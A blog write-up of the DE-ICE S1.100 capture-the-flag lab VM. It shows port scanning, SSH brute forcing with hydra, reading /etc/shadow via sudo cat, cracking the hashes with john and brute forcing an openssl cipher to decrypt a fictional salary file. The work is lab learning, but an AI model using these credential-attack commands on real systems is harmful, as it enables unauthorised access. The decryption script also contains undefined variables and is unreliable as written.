DE-ICE: S1.100

February 04, 2015

This is my write up for DE-ICE S1.100. A “boot to root” VM from the Hackingdojo website, also availble on Vulnhub. It has been built with vulnerabilities on purpose for you to exploit. The idea is to get root on the VM any way you can, then get the flag.

So first of all I started with an nmap scan of the box to see which ports were open…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali~# nmap 192.168.1.100

Nmap scan report for 192.168.1.100
Host is up (0.0027s latency).
Not shown: 992 filtered ports
PORT    STATE  SERVICE
20/tcp  closed ftp-data
21/tcp  open   ftp
22/tcp  open   ssh
25/tcp  open   smtp
80/tcp  open   http
110/tcp open   pop3
143/tcp open   imap
443/tcp closed https

Port 80 was open, so I opened up a web browser and went to http://192.168.1.100. It displays a welcome page to the challenge and a link to the game related pages at http://192.168.1.100/index2.php.

On the page there was a list of people and their emails. I used the names taken from the website and used a script from superkojiman to generate a username list.

I tried the sys admins potential usernames first as they were likley to have the heighest privilages on the box.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
adamadams
adamsadam
adam.adams
adams.adam
adamsa
aadams
aadam
a.adams
a.adam
adam
adams
bobbanter
banterbob
bob.banter
banter.bob
banterb
bbanter
bbob
b.banter
b.bob
bob
banter
chadcoffee
coffeechad
chad.coffee
coffee.chad
coffeec
ccoffee
cchad
c.coffee
c.chad
chad
coffee

Next I thought I would have a look at the ftp service, but after probing the ftp port a bit I found that it was broken:

1
2
3
4
5
6
7
8
9
10
11
root@kali~# nc -v -n 192.168.1.100 21

(UNKNOWN) [192.168.1.100] 21 (ftp) open
500 OOPS: could not bind listening IPv4 socket

root@kali~# nmap -p21 -sV 192.168.1.100

Nmap scan report for 192.168.1.100
Host is up (0.0032s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd (broken: could not bind listening IPv4 socket)

So next I decided try the usernames I had generated against the ssh service:

1
root@kali~# hydra -L users.txt -P /usr/share/wordlists/darkc0de.txt -t 5 -v -V -e ns -o login.txt 192.168.1.100 ssh

This took a while to run but luckly the user aadams was a valid user and their password was in my wordlist (nostradamus). So I then logged in via ssh using user aadams and the password nostradamus and checked what sudo privalages aadams had:

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali~# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ id
uid=1000(aadams) gid=10(wheel) groups=10(wheel)
aadams@slax:~$ sudo -l

Password:
User aadams may run the following commands on this host:
       (root) NOEXEC: /bin/ls
       (root) NOEXEC: /usr/bin/cat
       (root) NOEXEC: /usr/bin/more
       (root) NOEXEC: !/usr/bin/su *root*

The fact that I could execute cat with sudo meant I could cat the /etc/shadow file as well as the /etc/passwd file, copy the contents to my box, unshadow them and hopefully crack the root password:

1
2
3
4
5
6
7
8
9
10
11
12
13
aadams@slax:~$ sudo cat /etc/shadow

root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

aadams@slax:~$ cat /etc/passwd

root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
1
root@kali~# unshadow passwd.txt shadow.txt > unshadowed.txt

After unshadowing the files I used john the ripper to crack the password hashes:

1
root@kali~# john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

John came back with all the passwords for all the users including the root password, which was tarot. So I tried the root password john gave me:

1
2
3
4
aadams@slax:~$ su
Password: *****
root@slax:/home/aadams# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)

Thats it I have root, done… or is it?

There was one more challenge after this and that was to read the contents of the /home/ftp/incoming/salary_dec2003.csv.enc file.

Now this took me a while to even get started with, firstly by checking the file with the strings command I was able to find the string Salted__ at the start of the file:

1
2
3
4
5
6
7
root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/

This turned out to be the first 8 bytes of an openssl encrypted file, so I had a look online about openssl encryption and how to decrypt it. Then I remembered the strange message in the passwd file next to the root password: DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION.

So I had my command to decrypt and an idea that the password would be tarot (the root password) but no idea what the encryption type was. So I wrote a script to list all the types of encryption openssl supports and try each one:

1
2
3
4
5
6
7
8
9
#!/bin/bash
ciphers=`openssl list-cipher-commands`
for i in $ciphers; do
    $openssl enc -d -${i} -in salary_dec2003.csv.enc -k tarot > /dev/null 2>&1;
        if [[ $? == 0 ]]; then
            openssl enc -d -${i} -in ${in} -k ${key} -out ${out}
            exit 0
        fi
done

Then once the file was decrypted I could read the contents:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali~# cat salary_dec2003.csv

,Employee information,,,,,,,,,,,,,,
,Employee ID,Name,Salary,Tax Status,Federal Allowance (From W-4),State Tax (Percentage),Federal Income Tax (Percentage based on Federal Allowance),Social Security Tax (Percentage),Medicare Tax (Percentage),Total Taxes Withheld (Percentage),"Insurance
Deduction
(Dollars)","Other Regular
Deduction
(Dollars)","Total Regular Deductions (Excluding taxes, in dollars)","Direct Deposit Info
Routing Number","Direct Deposit Info
Account Number"
,1,Charles E. Ophenia,"$225,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$360.00,$500.00,$860.00,183200299,1123245
,2,Marie Mary,"$56,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1192291
,3,Pat Patrick,"$43,350.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2334432
,4,Terry Thompson,"$27,500.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$225.00,$350.00,183200299,1278235
,5,Ben Benedict,"$29,750.00",1,3,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$122.50,$247.50,183200299,2332546
,6,Erin Gennieg,"$105,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1456567
,7,Paul Michael,"$76,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1446756
,8,Ester Long,"$92,500.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1776782
,9,Adam Adams,"$76,250.00",1,5,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2250900
,10,Chad Coffee,"$55,000.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1590264

Thats it, challenge complete! This was pretty hard for me as a beginner but the idea is to get better over time and I hope by writing these up it will help me to learn more about why and how to do certain things.

How to import the top-hat-sec VMs into VMware

This is a short ‘How-To’ on how to import the [Top-Hat-Sec VMs](https://www.vulnhub.com/series/tophatsec,62/)hosted on VulnHub into VMware …… Continue reading

kioptrix level 2

Published on March 14, 2015

Kioptrix: Level 1

Published on February 15, 2015